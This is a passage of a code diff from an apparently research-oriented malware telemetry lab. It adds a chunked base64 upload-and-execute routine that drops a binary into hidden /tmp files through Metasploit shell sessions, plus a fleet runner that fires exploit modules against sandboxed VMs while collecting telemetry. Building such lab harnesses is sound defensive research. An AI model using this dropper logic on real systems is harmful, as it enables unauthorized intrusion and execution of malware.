+def workload_for(sample: Sample | None) -> Workload | None:
+    """Return the Workload for ``sample.profile``; None when no sample is
+    supplied (v1 fallback). Unknown profiles fall back to cpu-saturate."""
+    if sample is None:
+        return None
+    factory = _FACTORIES.get(sample.profile)
+    if factory is None:
+        log.warning("no workload profile for %r; falling back to cpu-saturate", sample.profile)
+        return _cpu_saturate()
+    return factory()
+
+
+def all_profiles() -> list[str]:
+    return sorted(_FACTORIES.keys())
+
+
+# ---------------------------------------------------------------------------
+# Tier-4 path: real-binary upload + execute inside the shell session
+# ---------------------------------------------------------------------------
+
+
+@dataclass(frozen=True)
+class ChunkedUpload:
+    """Multi-step upload plan. Each chunk is one ``shell_write`` call;
+    the driver issues them in order, then a final integrity check, then
+    the exec command. The last command runs the binary and writes its
+    PID to ``pid_path``."""
+    profile: str
+    chunks: tuple[str, ...]      # each is a complete shell command
+    finalize_cmd: str            # decode + verify sha256 + chmod
+    exec_cmd: str                # actually launch the binary
+    stop_cmd: str
+    bin_path: str
+    pid_path: str
+    expected_sha256: str
+    n_chunks: int
+
+
+# Conservative chunk size: msfrpc shell_write payloads are reliable
+# under ~16 KiB (single TCP write inside the framework). Use 8 KiB of
+# *base64* (which is 6 KiB of binary) per chunk so we leave room for
+# the wrapper and stay well under the limit.
+_CHUNK_B64_BYTES = 8 * 1024
+
+
+def chunked_real_binary_upload(
+    binary_bytes: bytes,
+    sample: Sample | None = None,
+) -> ChunkedUpload:
+    """Plan a chunked upload of ``binary_bytes`` into a shell session.
+
+    First chunk creates an empty file; subsequent chunks append a
+    base64 segment. ``finalize_cmd`` decodes + sha256-verifies the
+    result; ``exec_cmd`` launches the binary and stashes its PID.
+    The driver issues these as separate shell_writes so we never
+    push more than ~10 KiB through msfrpc in a single call."""
+    import base64 as _b64
+    import hashlib as _hashlib
+
+    profile = (sample.profile if sample else "real-binary")
+    pid_path = f"/tmp/.cis490-real-{profile}.pid"
+    bin_path = f"/tmp/.cis490-real-{profile}.bin"
+    b64_path = f"/tmp/.cis490-real-{profile}.b64"
+    sha = _hashlib.sha256(binary_bytes).hexdigest()
+    encoded = _b64.b64encode(binary_bytes).decode("ascii")
+
+    chunks: list[str] = []
+    chunks.append(f"mkdir -p /tmp; : > {b64_path}; echo upload-begin")
+    for i in range(0, len(encoded), _CHUNK_B64_BYTES):
+        seg = encoded[i:i + _CHUNK_B64_BYTES]
+        # printf '%s' appends the segment verbatim, with no trailing newline.
+        chunks.append(f"printf '%s' '{seg}' >> {b64_path}")
+
+    finalize = (
+        f"base64 -d {b64_path} > {bin_path} && rm -f {b64_path} && "
+        f"chmod +x {bin_path} && "
+        f"GOT=$(sha256sum {bin_path} | awk '{{print $1}}') && "
+        f"if [ \"$GOT\" = \"{sha}\" ]; then echo sha-ok; "
+        f"else echo sha-mismatch:$GOT; rm -f {bin_path}; false; fi"
+    )
+    exec_cmd = (
+        f"nohup {bin_path} </dev/null >/dev/null 2>&1 & "
+        f"echo $! > {pid_path}; disown 2>/dev/null || true; echo exec-ok"
+    )
+    stop = (
+        f"if [ -f {pid_path} ]; then "
+        f"  kill -- -$(cat {pid_path}) 2>/dev/null; "
+        f"  kill $(cat {pid_path}) 2>/dev/null; "
+        f"  rm -f {pid_path} {bin_path}; "
+        f"fi; true"
+    )
+    return ChunkedUpload(
+        profile=f"real:{profile}",
+        chunks=tuple(chunks),
+        finalize_cmd=finalize,
+        exec_cmd=exec_cmd,
+        stop_cmd=stop,
+        bin_path=bin_path,
+        pid_path=pid_path,
+        expected_sha256=sha,
+        n_chunks=len(chunks),
+    )
+
+
+def real_binary_workload(binary_bytes: bytes, sample: Sample | None = None) -> Workload:
+    """Backwards-compat wrapper that produces a single-shot Workload
+    by concatenating a chunked plan into one start_cmd. Kept for
+    callers that drive the v1 single-shell-write flow (e.g. tests).
+
+    Production path: the driver should call ``chunked_real_binary_upload``
+    and walk the chunks itself so msfrpc never sees a buffer-busting
+    payload."""
+    plan = chunked_real_binary_upload(binary_bytes, sample=sample)
+    start = "\n".join(list(plan.chunks) + [plan.finalize_cmd, plan.exec_cmd]) + "\n"
+    return Workload(
+        profile=plan.profile,
+        start_cmd=start,
+        stop_cmd=plan.stop_cmd,
+        description=f"Real binary upload+execute ({len(binary_bytes)} bytes, {plan.n_chunks} chunks)",
+    )
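
Note: a short worked check of the chunk arithmetic behind `_CHUNK_B64_BYTES`, assuming a made-up 25,600-byte payload. The helper `split_b64` is illustrative and only mirrors the slicing loop in `chunked_real_binary_upload`; it does not build the shell commands.

```python
import base64
import math

CHUNK_B64_BYTES = 8 * 1024  # same value as _CHUNK_B64_BYTES in workloads.py


def split_b64(data: bytes) -> list[str]:
    """Base64-encode data and slice it into fixed-size text segments."""
    encoded = base64.b64encode(data).decode("ascii")
    return [encoded[i:i + CHUNK_B64_BYTES]
            for i in range(0, len(encoded), CHUNK_B64_BYTES)]


payload = bytes(range(256)) * 100            # 25,600 bytes of made-up data
segments = split_b64(payload)

# Base64 emits 4 characters per 3 input bytes, padded up to a whole group.
encoded_len = 4 * math.ceil(len(payload) / 3)

# A full 8 KiB segment is a multiple of 4 characters, so it decodes on its
# own to exactly 6 KiB of binary.
full_segment_bytes = len(base64.b64decode(segments[0]))

# Concatenating the segments in order restores the original payload.
roundtrip = base64.b64decode("".join(segments))
print(len(segments), encoded_len, full_segment_bytes, roundtrip == payload)
```

The upload plan in the module carries one more entry than this segment count, because its first chunk only truncates the `.b64` file and echoes `upload-begin`.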
--- a/orchestrator/episode.py
+++ b/orchestrator/episode.py
@ -36,7 +36,8 @@ from datetime import datetime, timezone
 from pathlib import Path
 from typing import Callable

-from collectors import proc_qemu
+from collectors import guest_agent, pcap, perf_qemu, proc_qemu, qmp
+from samples.manifest import Sample

 from .ulid import new_ulid

@ -61,6 +62,38 @@ class EpisodeConfig:
    # When set, walk this schedule and ignore duration_s for sleep timing.
    # ``duration_s`` still goes in meta.schedule for record-keeping.
    phase_schedule: PhaseSchedule | None = None
+    # Optional: paths to QEMU sockets exposed by the launcher. When
+    # set, EpisodeRunner spins up additional collector threads.
+    qmp_socket: Path | None = None
+    qmp_interval_ms: int = 1000  # QMP queries are heavier than /proc reads
+    guest_agent_socket: Path | None = None
+    # Optional: bridge interface to capture per-episode pcap on. When
+    # set, EpisodeRunner spawns tcpdump for the duration of the
+    # schedule and bucketizes the result into netflow.jsonl on stop.
+    bridge_iface: str | None = None
+    bridge_ip: str = "10.200.0.1"
+    pcap_snaplen: int = 256
+    # Source 3: perf stat sampling. Disabled by default because perf
+    # needs CAP_SYS_ADMIN or perf_event_paranoid <= 1; enable
+    # explicitly per-episode when the host supports it.
+    enable_perf: bool = False
+    perf_interval_ms: int = 100
+    # The Sample that drove this episode's workload selection. Stamped
+    # into meta.json so trainers can join episodes by family / kind
+    # without re-deriving from events. None = v1 yes-loop fallback.
+    sample: Sample | None = None
+    # The exploit module that fired (Tier 3+). Plain dict so the runner
+    # doesn't need to import exploits.modules; populated by callers
+    # that have a ModuleConfig in hand.
+    exploit_meta: dict | None = None
+    # Snapshot/revert (Tier 0+):
+    #   revert_at_start — before any phase walks, loadvm <snapshot_name>.
+    #     Use this to drop the guest back to a known-good baseline at
+    #     the start of every episode in a long-lived-VM fleet loop.
+    #   revert_at_end — after the schedule walks, loadvm <snapshot_name>
+    #     so the next consumer of this VM starts clean too.
+    revert_at_start: bool = False
+    revert_at_end: bool = False


@dataclass
@ -68,8 +101,13 @@ class EpisodeResult:
    episode_id: str
    episode_dir: Path
    rows_proc: int
-    pid_disappeared: bool
-    duration_observed_s: float
+    rows_qmp: int = 0
+    rows_guest: int = 0
+    rows_netflow: int = 0
+    rows_perf: int = 0
+    pcap_bytes: int = 0
+    pid_disappeared: bool = False
+    duration_observed_s: float = 0.0
    phases_observed: list[str] = field(default_factory=list)


@ -83,25 +121,73 @@ class EpisodeRunner:
        self.on_phase = on_phase
        self.episode_id = cfg.episode_id or new_ulid()
        self.episode_dir: Path = cfg.data_root / "episodes" / self.episode_id
+        # Create the dir up front so external drivers can call
+        # emit_event() between construction and run() — e.g. an exploit
+        # driver that writes a driver_setup event before the schedule
+        # walks. The dir is otherwise empty until run() opens files.
+        self.episode_dir.mkdir(parents=True, exist_ok=True)
        self._t_mono_origin_ns: int = 0
        self._stop = threading.Event()

    # ---- public ---------------------------------------------------------

    def run(self) -> EpisodeResult:
-        self.episode_dir.mkdir(parents=True, exist_ok=True)
        self._t_mono_origin_ns = time.monotonic_ns()
-        started_at_wall = datetime.now(timezone.utc).isoformat()
+        # snapshot_load is the marker for "episode clock = 0". Emit it
+        # BEFORE writing meta.json: _write_meta() takes >1 ms on slow
+        # disks (Refs spectral/CIS490#7).
+        self.emit_event("snapshot_load", snapshot=self.cfg.snapshot_name)

+        started_at_wall = datetime.now(timezone.utc).isoformat()
        meta = self._initial_meta(started_at_wall)
        self._write_meta(meta)

-        self._emit_event(0, "snapshot_load", snapshot=self.cfg.snapshot_name)
+        # Snapshot revert at start: pause+restore the guest to a known
+        # baseline before phase 0. Requires a QMP socket and a snapshot
+        # already saved via savevm (the launcher is responsible for that).
+        if self.cfg.revert_at_start and self.cfg.qmp_socket is not None:
+            try:
+                client = qmp.QMPClient(self.cfg.qmp_socket)
+                client.connect()
+                try:
+                    out = client.loadvm(self.cfg.snapshot_name)
+                    self.emit_event(
+                        "snapshot_revert",
+                        when="start",
+                        snapshot=self.cfg.snapshot_name,
+                        output=(out or "").strip()[:256],
+                    )
+                finally:
+                    client.close()
+            except Exception as e:
+                log.warning("loadvm at start failed: %s", e)
+                self.emit_event(
+                    "snapshot_revert_failed",
+                    when="start",
+                    snapshot=self.cfg.snapshot_name,
+                    error=str(e),
+                )

-        rows_holder: dict[str, int] = {"rows": 0}
+        rows_holder: dict[str, int] = {"proc": 0, "qmp": 0, "guest": 0, "netflow": 0, "perf": 0}
+        pcap_handle: pcap.CaptureHandle | None = None
+        pcap_path = self.episode_dir / "network.pcap"
+        netflow_path = self.episode_dir / "netflow.jsonl"
+        if self.cfg.bridge_iface:
+            try:
+                pcap_handle = pcap.run_capture(
+                    bridge=self.cfg.bridge_iface,
+                    pcap_path=pcap_path,
+                    snaplen=self.cfg.pcap_snaplen,
+                )
+                self.emit_event("pcap_started", iface=self.cfg.bridge_iface)
+            except (OSError, FileNotFoundError) as e:
+                log.warning("pcap capture not available on %s: %s",
+                            self.cfg.bridge_iface, e)
+                self.emit_event("pcap_unavailable",
+                                iface=self.cfg.bridge_iface, error=str(e))

-        def _collector() -> None:
-            rows_holder["rows"] = proc_qemu.run_loop(
+        def _proc_collector() -> None:
+            rows_holder["proc"] = proc_qemu.run_loop(
                pid=self.cfg.target_pid,
                output_path=self.episode_dir / "telemetry-proc.jsonl",
                t_mono_origin_ns=self._t_mono_origin_ns,
@ -109,8 +195,44 @@ class EpisodeRunner:
                stop_event=self._stop,
            )

-        t = threading.Thread(target=_collector, daemon=True, name="proc_qemu")
-        t.start()
+        def _qmp_collector() -> None:
+            assert self.cfg.qmp_socket is not None
+            rows_holder["qmp"] = qmp.run_loop(
+                socket_path=self.cfg.qmp_socket,
+                output_path=self.episode_dir / "telemetry-qmp.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.qmp_interval_ms,
+                stop_event=self._stop,
+            )
+
+        def _guest_collector() -> None:
+            assert self.cfg.guest_agent_socket is not None
+            rows_holder["guest"] = guest_agent.run_loop(
+                socket_path=self.cfg.guest_agent_socket,
+                output_path=self.episode_dir / "telemetry-guest.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                stop_event=self._stop,
+            )
+
+        def _perf_collector() -> None:
+            rows_holder["perf"] = perf_qemu.run_loop(
+                pid=self.cfg.target_pid,
+                output_path=self.episode_dir / "telemetry-perf.jsonl",
+                t_mono_origin_ns=self._t_mono_origin_ns,
+                interval_ms=self.cfg.perf_interval_ms,
+                stop_event=self._stop,
+            )
+
+        threads: list[threading.Thread] = []
+        threads.append(threading.Thread(target=_proc_collector, daemon=True, name="proc_qemu"))
+        if self.cfg.qmp_socket is not None:
+            threads.append(threading.Thread(target=_qmp_collector, daemon=True, name="qmp"))
+        if self.cfg.guest_agent_socket is not None:
+            threads.append(threading.Thread(target=_guest_collector, daemon=True, name="guest_agent"))
+        if self.cfg.enable_perf:
+            threads.append(threading.Thread(target=_perf_collector, daemon=True, name="perf"))
+        for t in threads:
+            t.start()

        phases_observed: list[str] = []
        try:
@ -121,21 +243,60 @@ class EpisodeRunner:
                phases_observed = ["clean"]
                self._stop.wait(timeout=self.cfg.duration_s)
        finally:
-            self._stop.set()
-            t.join(timeout=2.0)
+            # Optional revert before stopping collectors so the
+            # transition shows up in their telemetry too — useful for
+            # building "snapshot revert" as a labeled phase later.
+            if self.cfg.revert_at_end and self.cfg.qmp_socket is not None:
+                try:
+                    client = qmp.QMPClient(self.cfg.qmp_socket)
+                    client.connect()
+                    try:
+                        out = client.loadvm(self.cfg.snapshot_name)
+                        self.emit_event(
+                            "snapshot_revert",
+                            when="end",
+                            snapshot=self.cfg.snapshot_name,
+                            output=(out or "").strip()[:256],
+                        )
+                    finally:
+                        client.close()
+                except Exception as e:
+                    log.warning("loadvm at end failed: %s", e)
+                    self.emit_event(
+                        "snapshot_revert_failed",
+                        when="end",
+                        snapshot=self.cfg.snapshot_name,
+                        error=str(e),
+                    )
+
+            self._stop.set()
+            for t in threads:
+                t.join(timeout=3.0)
+            if pcap_handle is not None:
+                rc = pcap.stop_capture(pcap_handle)
+                self.emit_event("pcap_stopped", rc=rc,
+                                pcap_bytes=pcap_path.stat().st_size if pcap_path.exists() else 0)
+                rows_holder["netflow"] = pcap.bucketize(
+                    pcap_path, netflow_path,
+                    bucket_ms=100,
+                    t_mono_origin_ns=self._t_mono_origin_ns,
+                    bridge_ip=self.cfg.bridge_ip,
+                )

-        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns
        pid_alive = _pid_alive(self.cfg.target_pid)
-        self._emit_event(
-            end_mono_ns,
-            "episode_end",
-            target_pid_alive=pid_alive,
-        )
+        self.emit_event("episode_end", target_pid_alive=pid_alive)
+        end_mono_ns = time.monotonic_ns() - self._t_mono_origin_ns

        meta["ended_at_wall"] = datetime.now(timezone.utc).isoformat()
+        pcap_size = pcap_path.stat().st_size if pcap_path.exists() else 0
        meta["result"] = {
            "phases_observed": phases_observed,
-            "rows_proc": rows_holder["rows"],
+            "rows_proc": rows_holder["proc"],
+            "rows_qmp": rows_holder["qmp"],
+            "rows_guest": rows_holder["guest"],
+            "rows_perf": rows_holder["perf"],
+            "rows_netflow": rows_holder["netflow"],
+            "pcap_bytes": pcap_size,
            "pid_alive_at_end": pid_alive,
            "duration_observed_s": end_mono_ns / 1_000_000_000,
        }
@ -143,16 +304,22 @@ class EpisodeRunner:
        (self.episode_dir / "done.marker").touch()

        log.info(
-            "episode %s complete: rows=%d duration=%.2fs phases=%s",
+            "episode %s complete: proc=%d qmp=%d guest=%d perf=%d netflow=%d pcap=%dB duration=%.2fs phases=%s",
            self.episode_id,
-            rows_holder["rows"],
+            rows_holder["proc"], rows_holder["qmp"], rows_holder["guest"],
+            rows_holder["perf"], rows_holder["netflow"], pcap_size,
            end_mono_ns / 1e9,
            phases_observed,
        )
        return EpisodeResult(
            episode_id=self.episode_id,
            episode_dir=self.episode_dir,
-            rows_proc=rows_holder["rows"],
+            rows_proc=rows_holder["proc"],
+            rows_qmp=rows_holder["qmp"],
+            rows_guest=rows_holder["guest"],
+            rows_netflow=rows_holder["netflow"],
+            rows_perf=rows_holder["perf"],
+            pcap_bytes=pcap_size,
            pid_disappeared=not pid_alive,
            duration_observed_s=end_mono_ns / 1_000_000_000,
            phases_observed=phases_observed,
@ -171,9 +338,7 @@ class EpisodeRunner:
                break
            t_mono = time.monotonic_ns() - self._t_mono_origin_ns
            self._emit_label(t_mono, phase, prev=prev, reason="scheduled")
-            self._emit_event(
-                t_mono, "phase_transition", to=phase, prev=prev
-            )
+            self.emit_event("phase_transition", to=phase, prev=prev)
            if self.on_phase is not None:
                try:
                    self.on_phase(phase)
@ -185,6 +350,17 @@ class EpisodeRunner:
        return observed

    def _initial_meta(self, started_at_wall: str) -> dict:
+        sample_meta: dict | None = None
+        if self.cfg.sample is not None:
+            s = self.cfg.sample
+            sample_meta = {
+                "name": s.name,
+                "family": s.family,
+                "category": s.category,
+                "profile": s.profile,
+                "kind": s.kind,
+                "sha256": s.sha256,
+            }
        return {
            "episode_id": self.episode_id,
            "schema_version": SCHEMA_VERSION,
@ -202,8 +378,8 @@ class EpisodeRunner:
                "ram_mib": None,
                "target_pid": self.cfg.target_pid,
            },
-            "exploit": None,
-            "sample": None,
+            "exploit": self.cfg.exploit_meta,
+            "sample": sample_meta,
            "schedule": {
                "baseline_seconds": self.cfg.duration_s,
                "interval_ms": self.cfg.interval_ms,
@ -220,7 +396,15 @@ class EpisodeRunner:
            f.write("\n")
        os.replace(tmp, path)

-    def _emit_event(self, t_mono_ns: int, event: str, **extra) -> None:
+    def emit_event(self, event: str, **extra) -> None:
+        """Append a row to events.jsonl. Public so external drivers
+        (e.g. the MSF exploit driver) can stamp their own events with
+        the same monotonic clock the orchestrator is using."""
+        t_mono_ns = (
+            time.monotonic_ns() - self._t_mono_origin_ns
+            if self._t_mono_origin_ns
+            else 0
+        )
        row = {
            "t_mono_ns": t_mono_ns,
            "t_wall_ns": time.time_ns(),
--- a/orchestrator/fleet.py
+++ b/orchestrator/fleet.py
@ -0,0 +1,467 @@
+"""Fleet runner — concurrent VM episodes with resource awareness.
+
+The lab host detects its own capacity, picks how many VMs to run in
+parallel without driving the box into swap or starving the host
+itself, and runs that many episodes simultaneously. Each slot gets a
+distinct ``Sample`` from the manifest (deterministically chosen by
+host_id + slot index), so every concurrent VM produces novel,
+labelable data.
+
+Capacity heuristic — defaults documented inline so they're auditable:
+
+  cores_total      = os.cpu_count()
+  cores_reserved   = max(1, cores_total // 8)        # host + collectors
+  ram_per_vm_mib   = 320                             # Alpine fits in 256
+                                                     # but leave 64 for
+                                                     # overhead (qemu+ovmf)
+  ram_headroom_mib = max(1024, ram_total // 8)       # never starve host
+  max_by_cores     = cores_total - cores_reserved
+  max_by_ram       = (ram_available - ram_headroom) // ram_per_vm
+  max_by_load      = max(1, max_by_cores // 2) if load_1m / cores_total > 0.75 else max_by_cores
+
+The smallest of these wins. The reasoning string is logged + saved
+into each episode's meta.json under ``fleet`` so post-hoc analysis
+can correlate "this episode was run when 6 VMs were concurrent" with
+its observed envelope.
+"""
+
+from __future__ import annotations
+
+import logging
+import os
+import shutil
+import signal
+import subprocess
+import threading
+import time
+from concurrent.futures import ThreadPoolExecutor, as_completed
+from dataclasses import dataclass, field
+from pathlib import Path
+
+from exploits.modules import (
+    ModuleConfig, load_module_configs, module_target_port, select_module,
+)
+from samples.manifest import Sample, SampleManifest
+
+
+log = logging.getLogger("cis490.fleet")
+
+
+def _msfrpcd_available(host: str = "127.0.0.1", port: int = 55553) -> bool:
+    """True when msfrpcd is listening — gate for the Tier-3 default.
+    A Tier-2 fallback runs when msfrpcd isn't there (still useful
+    data, just labeled with no-exploit so the trainer can filter)."""
+    import socket as _sk
+    try:
+        with _sk.create_connection((host, port), timeout=0.3):
+            return True
+    except OSError:
+        return False
+
+
+@dataclass(frozen=True)
+class FleetCapacity:
+    cores_total: int
+    cores_reserved: int
+    ram_total_mib: int
+    ram_available_mib: int
+    ram_per_vm_mib: int
+    ram_headroom_mib: int
+    load_1m: float
+    max_by_cores: int
+    max_by_ram: int
+    max_by_load: int
+    max_concurrent: int
+    rationale: str
+
+    def to_dict(self) -> dict:
+        return {
+            "cores_total": self.cores_total,
+            "cores_reserved": self.cores_reserved,
+            "ram_total_mib": self.ram_total_mib,
+            "ram_available_mib": self.ram_available_mib,
+            "ram_per_vm_mib": self.ram_per_vm_mib,
+            "ram_headroom_mib": self.ram_headroom_mib,
+            "load_1m": self.load_1m,
+            "max_by_cores": self.max_by_cores,
+            "max_by_ram": self.max_by_ram,
+            "max_by_load": self.max_by_load,
+            "max_concurrent": self.max_concurrent,
+            "rationale": self.rationale,
+        }
+
+
+@dataclass
+class FleetConfig:
+    host_id: str
+    repo_root: Path
+    data_root: Path
+    manifest: SampleManifest
+    # Module catalog for Tier-3 dispatch. Required for fleet-driven
+    # exploit-fire variety; empty catalog forces Tier-2 fallback.
+    modules: dict[str, ModuleConfig] = field(default_factory=dict)
+    # VM resource shape — must match what the launcher requests.
+    ram_per_vm_mib: int = 320
+    # Cap concurrency below the calculated max (e.g. for a smoke test).
+    max_concurrent_override: int | None = None
+    # Skip episodes whose sample requires a real binary that's not present.
+    require_real_samples: bool = False
+    # Force Tier-2 even when msfrpcd is up; used by tests + dev runs
+    # that want a no-exploit baseline.
+    force_tier2: bool = False
+    # msfrpcd connectivity (read by tier-3 driver via env).
+    msfrpcd_host: str = "127.0.0.1"
+    msfrpcd_port: int = 55553
+
+
+def _read_meminfo() -> dict[str, int]:
+    out: dict[str, int] = {}
+    try:
+        with open("/proc/meminfo") as f:
+            for line in f:
+                k, _, rest = line.partition(":")
+                v = rest.strip()
+                if v.endswith(" kB"):
+                    try:
+                        out[k] = int(v[:-3]) * 1024
+                    except ValueError:
+                        pass
+    except OSError:
+        pass
+    return out
+
+
+def _read_loadavg() -> float:
+    try:
+        with open("/proc/loadavg") as f:
+            return float(f.read().split()[0])
+    except (OSError, ValueError, IndexError):
+        return 0.0
+
+
+def detect_capacity(*, ram_per_vm_mib: int = 320) -> FleetCapacity:
+    cores_total = os.cpu_count() or 1
+    # Reserve at least 1 core, more if the host has many.
+    cores_reserved = max(1, cores_total // 8)
+
+    mem = _read_meminfo()
+    ram_total_b = mem.get("MemTotal", 0)
+    ram_avail_b = mem.get("MemAvailable", ram_total_b)
+    ram_total_mib = ram_total_b // (1024 * 1024)
+    ram_available_mib = ram_avail_b // (1024 * 1024)
+    # Keep headroom for the host: at least 1 GiB, or 1/8 of total RAM if larger.
+    ram_headroom_mib = max(1024, ram_total_mib // 8)
+
+    load_1m = _read_loadavg()
+
+    max_by_cores = max(0, cores_total - cores_reserved)
+    if ram_per_vm_mib <= 0:
+        max_by_ram = max_by_cores
+    else:
+        max_by_ram = max(0, (ram_available_mib - ram_headroom_mib) // ram_per_vm_mib)
+
+    # Load-based cap: if the host is already busy, run fewer VMs.
+    if cores_total and load_1m / cores_total > 0.75:
+        # Halve, floor 1.
+        max_by_load = max(1, max_by_cores // 2)
+    else:
+        max_by_load = max_by_cores
+
+    candidates = [max_by_cores, max_by_ram, max_by_load]
+    max_concurrent = max(0, min(candidates))
+
+    # max_concurrent always equals one of the candidates; the first match names the binding cap.
+    binding = ["cores", "ram", "load"][candidates.index(max_concurrent)]
+    rationale = (
+        f"cores_total={cores_total} reserved={cores_reserved} "
+        f"ram_avail_mib={ram_available_mib} headroom={ram_headroom_mib} "
+        f"per_vm={ram_per_vm_mib} load_1m={load_1m:.2f} "
+        f"-> max_concurrent={max_concurrent} (binding={binding})"
+    )
+    log.info("capacity: %s", rationale)
+
+    return FleetCapacity(
+        cores_total=cores_total,
+        cores_reserved=cores_reserved,
+        ram_total_mib=ram_total_mib,
+        ram_available_mib=ram_available_mib,
+        ram_per_vm_mib=ram_per_vm_mib,
+        ram_headroom_mib=ram_headroom_mib,
+        load_1m=load_1m,
+        max_by_cores=max_by_cores,
+        max_by_ram=max_by_ram,
+        max_by_load=max_by_load,
+        max_concurrent=max_concurrent,
+        rationale=rationale,
+    )
+
+
+# ---------------------------------------------------------------------------
+# Per-slot episode execution
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class SlotResult:
+    slot: int
+    sample_name: str
+    sample_kind: str
+    episode_id: str | None
+    rc: int
+    duration_s: float
+    tier: str = "tier2"            # "tier3" when an exploit fired
+    module_name: str | None = None  # exploit module identifier (Tier 3 only)
+    error: str | None = None
+    extra: dict = field(default_factory=dict)
+
+
+def _run_slot(
+    cfg: FleetConfig,
+    slot: int,
+    sample: Sample,
+    episode_index: int,
+    capacity: FleetCapacity,
+) -> SlotResult:
+    """Run one episode in a dedicated slot.
+
+    Dispatch:
+      - Tier 3 (default when msfrpcd is listening AND a module catalog
+        is populated): real exploit fire via run_tier3_demo.py with a
+        deterministically-selected module + sample.
+      - Tier 2 (fallback): no exploit; the controller drives a labeled
+        workload directly via the serial console. Recorded in
+        SlotResult.tier so trainers can filter the no-exploit episodes.
+    """
+    # Per-slot run dir keeps QEMU sockets + pidfiles isolated. Without
+    # this, parallel slots rmtree each other's run dir mid-boot.
+    run_dir_base = "/tmp/cis490-vm-fleet"
+
+    # Decide tier.
+    bridge_iface = os.environ.get("BRIDGE") or None
+    # Filter the catalog to modules that can actually fire under the
+    # current launcher mode. Reverse / bind shells require the host-
+    # only bridge (no SLIRP+restrict=on guest egress), so skip those
+    # when BRIDGE isn't set; otherwise the exploit fires but the
+    # session never lands and the episode degenerates to a 30 s
+    # session_open_timeout.
+    if cfg.modules:
+        if bridge_iface:
+            usable_modules = dict(cfg.modules)
+        else:
+            usable_modules = {
+                k: v for k, v in cfg.modules.items() if not v.requires_bridge
+            }
+    else:
+        usable_modules = {}
+    tier3_ready = (
+        not cfg.force_tier2
+        and bool(usable_modules)
+        and _msfrpcd_available(cfg.msfrpcd_host, cfg.msfrpcd_port)
+    )
+
+    env = os.environ.copy()
+    env["SLOT"] = str(slot)
+    env["SAMPLE_NAME"] = sample.name
+    env["SAMPLE_PROFILE"] = sample.profile
+    env["SAMPLE_KIND"] = sample.kind
+    env["FLEET_HOST_ID"] = cfg.host_id
+    env["FLEET_EPISODE_INDEX"] = str(episode_index)
+    env["FLEET_MAX_CONCURRENT"] = str(capacity.max_concurrent)
+
+    venv_py = cfg.repo_root / ".venv" / "bin" / "python"
+    py = str(venv_py) if venv_py.exists() else "python3"
+
+    log_dir = cfg.data_root / "fleet-logs"
+    log_dir.mkdir(parents=True, exist_ok=True)
+    out_log = log_dir / f"slot-{slot}-ep-{episode_index}.log"
+
+    if tier3_ready:
+        module = select_module(
+            usable_modules,
+            host_id=cfg.host_id, slot=slot, episode_index=episode_index,
+        )
+        target_port = module_target_port(module) or 21
+        # Per-slot runner dir for the target VM.
+        run_dir = f"{run_dir_base}-target-{slot}"
+        env["RUN_DIR"] = run_dir
+        # Each slot gets a unique host-side hostfwd port so concurrent
+        # targets don't collide on the loopback port.
+        env["PORT_BASE"] = str(target_port + slot * 1000)
+        if bridge_iface:
+            env["BRIDGE"] = bridge_iface
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_tier3_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--module", module.name,
+            "--sample", sample.name,
+            "--target-port", str(target_port + slot * 1000),
+        ]
+        tier = "tier3"
+        module_name: str | None = module.name
+    else:
+        run_dir = f"{run_dir_base}-{slot}"
+        env["RUN_DIR"] = run_dir
+        cmd = [
+            py,
+            str(cfg.repo_root / "tools" / "run_real_vm_demo.py"),
+            "--data-root", str(cfg.data_root),
+            "--run-dir", run_dir,
+            "--sample", sample.name,
+        ]
+        tier = "tier2"
+        module_name = None
+        if not cfg.force_tier2 and not usable_modules:
+            log.warning("slot=%d falling back to Tier 2: no usable exploit modules", slot)
+        elif not cfg.force_tier2:
+            log.warning("slot=%d falling back to Tier 2: msfrpcd unreachable at %s:%d",
+                        slot, cfg.msfrpcd_host, cfg.msfrpcd_port)
+
+    log.info(
+        "slot=%d ep=%d tier=%s sample=%s module=%s run_dir=%s",
+        slot, episode_index, tier, sample.name, module_name, run_dir,
+    )
+
+    started = time.monotonic()
+    try:
+        with out_log.open("ab") as logf:
+            proc = subprocess.run(
+                cmd,
+                cwd=str(cfg.repo_root),
+                env=env,
+                stdout=logf,
+                stderr=subprocess.STDOUT,
+                check=False,
+            )
+        rc = proc.returncode
+        err = None
+    except (OSError, subprocess.SubprocessError) as e:
+        rc = -1
+        err = str(e)
+    duration = time.monotonic() - started
+
+    return SlotResult(
+        slot=slot,
+        sample_name=sample.name,
+        sample_kind=sample.kind,
+        episode_id=None,
+        rc=rc,
+        duration_s=duration,
+        tier=tier,
+        module_name=module_name,
+        error=err,
+    )
+
+
+# ---------------------------------------------------------------------------
+# FleetRunner
+# ---------------------------------------------------------------------------
+
+
+@dataclass
+class FleetRunResult:
+    capacity: FleetCapacity
+    slots: list[SlotResult]
+    total_duration_s: float
+
+
+class FleetRunner:
+    def __init__(self, cfg: FleetConfig) -> None:
+        self.cfg = cfg
+        self._stop = threading.Event()
+
+    def stop(self) -> None:
+        self._stop.set()
+
+    def run(
+        self,
+        *,
+        episodes: int = 1,
+        episode_index_base: int = 0,
+        capacity_override: FleetCapacity | None = None,
+    ) -> FleetRunResult:
+        capacity = capacity_override or detect_capacity(
+            ram_per_vm_mib=self.cfg.ram_per_vm_mib,
+        )
+        n_slots = capacity.max_concurrent
+        if self.cfg.max_concurrent_override is not None:
+            n_slots = min(n_slots, self.cfg.max_concurrent_override)
+        if n_slots <= 0:
+            log.warning(
+                "fleet capacity is zero (%s); cannot run", capacity.rationale,
+            )
+            return FleetRunResult(
+                capacity=capacity, slots=[], total_duration_s=0.0,
+            )
+
+        log.info(
+            "fleet host=%s slots=%d episodes=%d manifest_size=%d",
+            self.cfg.host_id, n_slots, episodes, len(self.cfg.manifest),
+        )
+
+        all_results: list[SlotResult] = []
+        t_start = time.monotonic()
+        for ep in range(episodes):
+            if self._stop.is_set():
+                break
+            episode_index = episode_index_base + ep
+            slot_samples = [
+                self.cfg.manifest.select(
+                    host_id=self.cfg.host_id,
+                    slot=slot,
+                    episode_index=episode_index,
+                )
+                for slot in range(n_slots)
+            ]
+            if self.cfg.require_real_samples:
